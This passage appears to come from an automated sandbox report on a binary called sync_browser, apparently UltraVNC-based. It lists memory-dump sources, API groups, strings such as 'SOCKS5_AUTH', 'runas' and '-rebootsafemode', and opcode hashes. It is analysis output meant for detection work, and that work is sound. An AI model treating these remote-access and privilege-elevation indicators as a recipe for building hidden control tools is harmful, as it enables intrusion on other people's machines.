                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Create$FileModuleNamePrivateProfile
                                                    • String ID: Software\UltraVNC$UseRegistry$admin$mslogon
                                                    • API String ID: 27673491-2056936749
                                                    • Opcode ID: 49ca59dd5d1ce4bd8261c69328d6c9401fd879975b581b5eca3f4e4a4bfb3057
                                                    • Instruction ID: f2758d6c570dd27c0c5ec421cbaa1a03af81ac02110f9779912dd6cd1d853225
                                                    • Opcode Fuzzy Hash: 49ca59dd5d1ce4bd8261c69328d6c9401fd879975b581b5eca3f4e4a4bfb3057
                                                    • Instruction Fuzzy Hash: 41212C72518B9287E7609F24F890BAAFB64FB88754FC01136EA8D07A18DF3DD1148B10
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$RectVisible$Foreground
                                                    • String ID:
                                                    • API String ID: 2499709836-0
                                                    • Opcode ID: 48f1e47169105f78f1c5671409c72268c28db6c5ed06a4c25a4347c71102ace5
                                                    • Instruction ID: edae2cb8d0e7fdbfe06ab3b37fbb4b75556241143db2259f50d4590014b45251
                                                    • Opcode Fuzzy Hash: 48f1e47169105f78f1c5671409c72268c28db6c5ed06a4c25a4347c71102ace5
                                                    • Instruction Fuzzy Hash: 17D16C36B146928FEB14DFB9E4406AC77B2BB48B8CB90423ADE0D67B48DF349495C750
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueVersionWindows
                                                    • String ID: SeShutdownPrivilege
                                                    • API String ID: 337752880-3733053543
                                                    • Opcode ID: ccb4f6b8adec0e5263e9b53491d22d093fe75a13b47b81360652c4a9f3302a15
                                                    • Instruction ID: 01280dad5f70b2e6f6765b70e84c1e39378a97fe7fd62cad16c028875f409e47
                                                    • Opcode Fuzzy Hash: ccb4f6b8adec0e5263e9b53491d22d093fe75a13b47b81360652c4a9f3302a15
                                                    • Instruction Fuzzy Hash: 02113D71A1868286E754EB60F4557AEB7A0FF84B44FC04036E98E47658DF7CD049CB10
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 3778485334-0
                                                    • Opcode ID: 06a598ca6a92d0ea32fba2d50ca2368aa251c6b52815f87316808892bb3a9e84
                                                    • Instruction ID: 70654c53d64df1532949fb04206758c56374a5ee989cb1410a0499950029b01f
                                                    • Opcode Fuzzy Hash: 06a598ca6a92d0ea32fba2d50ca2368aa251c6b52815f87316808892bb3a9e84
                                                    • Instruction Fuzzy Hash: 8331C535918B9286EB54AB54E8407ADBBA4FF84B98FD00136DE8D43765DF7CE044C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: recv$send$_errno_invalid_parameter_noinfo_wgetenv
                                                    • String ID: SOCKS5_AUTH
                                                    • API String ID: 788663964-1698957378
                                                    • Opcode ID: a52017378aba2792d1574ce981dd4d2621b7e1f64bedfacb3fbf5eec73a6fd49
                                                    • Instruction ID: b3bed1daafc556c4d2052df4defa1875140f697420d38c23e9a997c08f8c2532
                                                    • Opcode Fuzzy Hash: a52017378aba2792d1574ce981dd4d2621b7e1f64bedfacb3fbf5eec73a6fd49
                                                    • Instruction Fuzzy Hash: 8981F82261CA42C6F760A769A5406BEE691EF85B98FC42133ED5D476C9EF3CE406C710
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$FindFirstModuleName
                                                    • String ID: *.dsm
                                                    • API String ID: 1519589655-1970359449
                                                    • Opcode ID: 5ec88052d5adebc3db2df3dc82cb1158468950cb75ad4b7486c7f1220c09e049
                                                    • Instruction ID: 420a524136b89f20b0457a1ba5d8f93b72e8af56b5e337ad92aa5eaeffac63ba
                                                    • Opcode Fuzzy Hash: 5ec88052d5adebc3db2df3dc82cb1158468950cb75ad4b7486c7f1220c09e049
                                                    • Instruction Fuzzy Hash: 7431522261869586EA649B34A8446AFA790FF88BB4FC05332DE7D436D8DF3CE109C710
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: PrivateProfile$FileModuleNameQueryValue
                                                    • String ID: UseRegistry$admin$admin_auth
                                                    • API String ID: 1028385882-3376419731
                                                    • Opcode ID: d5f9d5c0af733a8a18aaad5fcf10d0583086e22d43d578638aeb5c775166167f
                                                    • Instruction ID: 79ef6e34172c35b5119788a5250d7a09351e7967e9b2e50500fa0de99c811b90
                                                    • Opcode Fuzzy Hash: d5f9d5c0af733a8a18aaad5fcf10d0583086e22d43d578638aeb5c775166167f
                                                    • Instruction Fuzzy Hash: 58214431618A92C7EA50DB10E884AAEB7A4FB88B88FC01036FE4D47B58CF3DD545CB10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                    • String ID: -rebootsafemode$p$runas
                                                    • API String ID: 3648085421-4291177908
                                                    • Opcode ID: ebe23701378919e1af33a6bf656780ce82059cac4ad0fb8edc734de712cd212d
                                                    • Instruction ID: 9dfb62438138e5e5c64c9de5bbbf74d2041fd258c9c5b9ef49b41df4e79600f2
                                                    • Opcode Fuzzy Hash: ebe23701378919e1af33a6bf656780ce82059cac4ad0fb8edc734de712cd212d
                                                    • Instruction Fuzzy Hash: C801E532619B8186E625AF20F49479BB7A4FB88744FC0013AEACD02B28DF3CD158CB10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close$FileModuleNamePrivateProfile
                                                    • String ID: UseRegistry$admin
                                                    • API String ID: 3032973919-2802730080
                                                    • Opcode ID: f394e00a07ad10370d3a9fb3f4169cee617936cad869a8b398f64821c48fdab7
                                                    • Instruction ID: 51e35cdf16d1eb08fc09b949347656e3c3aae090f320a97da1bbd6cd119f5c47
                                                    • Opcode Fuzzy Hash: f394e00a07ad10370d3a9fb3f4169cee617936cad869a8b398f64821c48fdab7
                                                    • Instruction Fuzzy Hash: 9B01E965A1995282FA69BB64E864BBDAB60EFC9F44FC50037DD0E469648F3DE104C720
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 1239891234-0
                                                    • Opcode ID: cab22b7f63e68bd4fe1f659d6095baf5ecdb6c5b170d8f81b70fd2e30acf9a7e
                                                    • Instruction ID: d9cf394869e93ffee90049aefdabb8a6c3cbb7238701d7ec57bf58f58357223b
                                                    • Opcode Fuzzy Hash: cab22b7f63e68bd4fe1f659d6095baf5ecdb6c5b170d8f81b70fd2e30acf9a7e
                                                    • Instruction Fuzzy Hash: A3314132618B8186D724DB25E4406AEB7A4FB84B58FD00136EE9D43B99DF38D545CB10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Iconic
                                                    • String ID: 0
                                                    • API String ID: 110040809-4108050209
                                                    • Opcode ID: ada12bffe0504ce749bfb447d148339bb7949db47e61c86c1c89a82587fb054e
                                                    • Instruction ID: ddf7b0fc405736f11ca7b2cbae3ee252fb04fa682eb5f57af28e71d35b202c38
                                                    • Opcode Fuzzy Hash: ada12bffe0504ce749bfb447d148339bb7949db47e61c86c1c89a82587fb054e
                                                    • Instruction Fuzzy Hash: 2CA14A326046919BE75C9F39D5807ACB7E4FB48F48F84813ADB5D87644DB39E868CB20
                                                    APIs
                                                      • Part of subcall function 00007FF7D593D390: GetModuleFileNameA.KERNEL32 ref: 00007FF7D593D3BB
                                                    • GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987D89
                                                      • Part of subcall function 00007FF7D5987650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987689
                                                      • Part of subcall function 00007FF7D5987650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7D59876DD
                                                      • Part of subcall function 00007FF7D5987650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7D5987722
                                                      • Part of subcall function 00007FF7D59878E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D598792E
                                                      • Part of subcall function 00007FF7D59878E0: RegQueryValueExA.ADVAPI32 ref: 00007FF7D598796A
                                                      • Part of subcall function 00007FF7D59878E0: RegQueryValueExA.ADVAPI32 ref: 00007FF7D59879B2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: PrivateProfile$CreateQueryValue$FileModuleName
                                                    • String ID: UseRegistry$admin$group3
                                                    • API String ID: 1728753321-3776872688
                                                    • Opcode ID: da8d5682ec0159b53c6e6ac02bc9a146a6fe897d91bd88be9db6412787fbbace
                                                    • Instruction ID: 10d366a1a2871662520a23331f2251867b38e4fe9ccc60227ec0f22a0dde7ec1
                                                    • Opcode Fuzzy Hash: da8d5682ec0159b53c6e6ac02bc9a146a6fe897d91bd88be9db6412787fbbace
                                                    • Instruction Fuzzy Hash: A6110C62A1859282EA24BB24F4A17FDA750FF88B48FC40037ED5D466A6CF3DE114D720
                                                    APIs
                                                      • Part of subcall function 00007FF7D593D390: GetModuleFileNameA.KERNEL32 ref: 00007FF7D593D3BB
                                                    • GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987EED
                                                      • Part of subcall function 00007FF7D5987650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987689
                                                      • Part of subcall function 00007FF7D5987650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7D59876DD
                                                      • Part of subcall function 00007FF7D5987650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7D5987722
                                                      • Part of subcall function 00007FF7D59877F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987840
                                                      • Part of subcall function 00007FF7D59877F0: RegQueryValueExA.ADVAPI32 ref: 00007FF7D598787D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: PrivateProfile$Create$FileModuleNameQueryValue
                                                    • String ID: UseRegistry$admin$locdom2
                                                    • API String ID: 1788981264-80830018
                                                    • Opcode ID: 453e7d21788d8a281cd3351b72fc90b6b80e6296ed96c2d368ba72f2aba873be
                                                    • Instruction ID: e6da626920df17548f45cf6458b7116bc6a14fff335b7e2e3a99746d9676ebda
                                                    • Opcode Fuzzy Hash: 453e7d21788d8a281cd3351b72fc90b6b80e6296ed96c2d368ba72f2aba873be
                                                    • Instruction Fuzzy Hash: 2F015E61A1895283FA25BB35A491BBDAB91EF88B08FC50433ED1D46592CF3DE105D630
                                                    APIs
                                                      • Part of subcall function 00007FF7D593D390: GetModuleFileNameA.KERNEL32 ref: 00007FF7D593D3BB
                                                    • GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987E50
                                                      • Part of subcall function 00007FF7D5987650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987689
